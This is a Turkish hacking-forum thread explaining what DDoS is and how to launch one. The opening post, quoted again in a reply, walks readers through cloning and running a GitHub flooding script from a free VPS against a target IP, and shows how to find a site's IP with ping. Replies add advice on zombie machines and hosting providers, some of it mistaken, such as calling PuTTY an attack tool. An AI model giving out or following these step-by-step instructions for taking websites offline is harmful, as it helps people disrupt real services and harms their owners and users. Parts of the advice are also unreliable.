Ddos nedir? Nasıl atılır?

"Xale

Katılımcı Üye
16 Eki 2020
442
20
DDoS nedir? Nasıl atılır?

Herkede Selamlar TürkHackTeam ailesi bugün sizlere ddos nedir ve nasıl atılır bunlardan bahsedeceğim.

Ddos nedir?
Ddos yada Denial of Service, internete bağlı bir hostun hizmetlerini geçici veya süresiz olarak aksatarak, bir makinenin veya ağ kaynaklarının asıl kullanıcılar tarafından ulaşılamamasını hedefleyen bir siber saldırıdır. Vikipedi

Ddos nasıl atılır?
Öncelikle bir vps ye ihtiyacımız olucak, ücretsiz olarak almak için aşağıdaki konuma göz atabilirsiniz:
https://www.turkhackteam.org/siber-guvenlik/1966196-ucretsiz-linux-vps-alma-sinirsiz.html

Vps nedir?
Vps yada virtual private server, fiziksel bir sunucunun sanallaştırma yazılımları ile birden çok sunucuya bölünerek kaynakları en verimli şekilde kullanmasını sağlayan yapıdır. Her VPS birbirinden bağımsız ve adanmış bir sunucu gibi çalışır. Vikipedi

Ddos atmak için vps serverimize şu komutları yazıyoruz:

Kod:
git clone https://github.com/thexale/xaledoser.git

Kod:
cd xaledoser

Kod:
chmod +x xdoser.py

Kod:
./xdoser.py -s **ddos atılacak server ipsi**
Eğer ddosu bir siteye atıcaksanız o sitenin ip adresini bulmak için Windows bilgisayarınızın başlat bölümüne cmd yazın ve cmd ye ping -t siteadresi.com yazın. (siteadresi.com ddos atacağınız site adresi.) sonra karşınıza Pinging siteadresi.com [site.ip.adre.si] with 32 bytes of data:

Ve sitenin ip adresini bulduk. ( [] sembollerinin arasındaki sayılar sitenin ip adresi. Örnek: 77.245.159.2 )

Ve ddos işlemi başlayacaktır, Hayırlı günler TürkHackTeam ailesi.

Son düzenleme:

blacksmt

Uzman üye
27 Haz 2020
1,105
221
CyberKeTa
DDOSta önemli olan şey zombi bilgisayar ve internet ve makine gücüdür. Ne kadar zombi bilgisayar yani ddos atan bilgisayar olursa o kadar iyidir. Tek başına bir site çökertmek kolay değil.

"Xale

Katılımcı Üye
16 Eki 2020
442
20
Zaten DDoS attığında tek makineden atmış olmuyorsun diye biliyorum, yani benim bildiğime göre bu DoS ve ping atarken geçerli diye biliyorum.

ferhat451

Üye
25 Ocak 2019
93
0
TuranDevleti
Merhaba..

Konu açmadan önce forumda konunuz ile ilgili arama yaparak konunun açılıp açılmadığını kaç kişi tarafından açıldığını inceleyerek konularınızı açınız.

İyi forumlar..

OBT is HeRYerDe

Anka Team
11 Ara 2020
2,588
1,497
Cevap: DDoS nedir? Nasıl atılır?

Herkede Selamlar TürkHackTeam ailesi bugün sizlere ddos nedir ve nasıl atılır bunlardan bahsedeceğim.

Ddos nedir?
Ddos yada Denial of Service, internete bağlı bir hostun hizmetlerini geçici veya süresiz olarak aksatarak, bir makinenin veya ağ kaynaklarının asıl kullanıcılar tarafından ulaşılamamasını hedefleyen bir siber saldırıdır. Vikipedi

Ddos nasıl atılır?
Öncelikle bir vps ye ihtiyacımız olucak, ücretsiz olarak almak için aşağıdaki konuma göz atabilirsiniz:
https://www.turkhackteam.org/siber-guvenlik/1966196-ucretsiz-linux-vps-alma-sinirsiz.html

Vps nedir?
Vps yada virtual private server, fiziksel bir sunucunun sanallaştırma yazılımları ile birden çok sunucuya bölünerek kaynakları en verimli şekilde kullanmasını sağlayan yapıdır. Her VPS birbirinden bağımsız ve adanmış bir sunucu gibi çalışır. Vikipedi

Ddos atmak için vps serverimize şu komutları yazıyoruz:

Kod:
git clone https://github.com/thexale/xaledoser.git

Kod:
cd xaledoser

Kod:
chmod +x xdoser.py

Kod:
./xdoser.py -s **ddos atılacak server ipsi**
Eğer ddosu bir siteye atıcaksanız o sitenin ip adresini bulmak için Windows bilgisayarınızın başlat bölümüne cmd yazın ve cmd ye ping -t siteadresi.com yazın. (siteadresi.com ddos atacağınız site adresi.) sonra karşınıza Pinging siteadresi.com [site.ip.adre.si] with 32 bytes of data:

Ve sitenin ip adresini bulduk. ( [] sembollerinin arasındaki sayılar sitenin ip adresi. Örnek: 77.245.159.2 )

Ve ddos işlemi başlayacaktır, Hayırlı günler TürkHackTeam ailesi.

🔸🔹🔸🔹🔸🔹🔸🔹🔸🔹🔸🔹🔸🔹🔸

Merhaba,

Site çökertmek için fazla makina olması lazım arkadaşımızın belirttiği gibi mesala sunucumuz "Cloudsigma" çok yüksek İnternet ve makina sayısını fazlalaştırır ve siteyi çökertmeyi sağladığı için bununla siteye saldırmak iyi olur.

Önerdiğim:

🔹Cloudsigma
(internette araştırırsan bulursun)

🔹Putty
Bu uygulamayı kullanarak hedef siteyi çökertirsin. (DDOS ATAR) uzak makinaya bağlanarak DDOS atmak mümkün

Dediğim gibi internette araştır verdiğim şeyleri bu şekilde öğrenebilirsin.

Saygılarımla...

♾ OBT is HerYerDe

Son düzenleme:

ZiksthemW

Uzman üye
28 Mar 2020
1,025
113
Oslo

Merhaba,

Site çökertmek için makine gücünün fazla olması lazım arkadaşımızın belirttiği gibi mesala sunucumuz "Cloudsigma" makine gücünü aşırı derecede fazlalaştırır ve siteyi çökertmeyi sağladığı için bununla siteye saldırmak iyi olur.

Önerdiğim:

🔹Cloudsigma
(internette araştırırsan bulursun)

🔹Putty
Bu uygulamayı kullanarak hedef siteyi çölertirsin.

Dediğim gibi internette araştır verdiğim şeyleri bu şekilde öğrenebilirsin.

🔹🔸🔹🔸🔹🔸🔹🔸🔹🔸🔹🔸🔹🔸

🔹🔸🔹🔸🔹🔸🔹🔸🔹🔸🔹🔸🔹🔸

Saygılarımla...

♾ OBT is HerYerDe

Merhaba,

PuTTy ne zaman site çökertmeye başladı? PuTTy bir ssh programıdır. SSH bağlantılarına yarar. DDoS'u Linuxunuzun içindeki script ile atarsınız.

Saygılarımla,
ZiksthemW

STAR GUARDIAN

Yeni üye
4 Ocak 2020
40
0
Geçtin

Tek başıma zamanında çok denemiştim. Ve 2 gün boyunca sadece kendi wifi mi vurdum. Tahminimce DDOS için en az 100 vds ile çıkış yapılırsa etkiliyebilir.

"Xale

Katılımcı Üye
16 Eki 2020
442
20
Merhaba,
ben bu konuda zaten vps server ile yani ssh bağlantısı ile nasıl ddos atıldığını anlattım, vps ile yaptığımız için kendi internetinizi yemez.

Saygılarımla,
Xale.

Ben bu konuda zaten vps server ile nasıl yapıldığını anlattım. PuTTY`de zaten vps bağlantıları için kullanılıyor. Ve ben bu konuda DDoS atmayı anlattım ve DDoS zaten birden fazla cihaz ile yapılıyor ve verdiğim DDoS scriptindede çoklu makineden saldırı yapılıyor. (Yanlışım varsa düzeltin.)

Saygılarımla,
Xale.

Moderatör tarafında düzenlendi:
22 Şub 2021
219
1
System32
Öncelikle emeğine sağlık güzel bir çalışma olmuş
Bir sorum var bu loıc programında karşı tarafa bir atak yapıldığı zaman bizim ıp miz karşı tarafta görülür mü?
Mesela WireShark toolu ile

Hasqer

Uzman üye
27 Haz 2016
1,197
7
Merhabalar,
scripti incelemedim ama bu işlerle uğraşmış biri olarak söyleyeyim.
Vps veya vds üzerinden çalıştıracağınız scriptler DoS saldırısı olacaktır bu da tek makine üzerinden gerçekleşir. Tek tek 50 makinede script çalıştırmakla uğraşmıyoruz normal olarak.
DDoS ise zombi bilgisayarlar üzerinden yapılan toplu hali oluyor aslında hacker kendi internetini kullanmıyor sadece zombilere bir hedef gösteriyor.

DDoS için genelde sunucular kullanılmıyor genelde sıradan insanların bilgisayarları kullanılıyor.

Sizin bu yaptığınız işlemde doser kullanarak bir dos saldırısı yapıyorsunuz.
Bu şekilde de bir siteyi kapatabilir misiniz? Tabii ki, ama daha sağda solda kalmış küçük siteler olur.

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.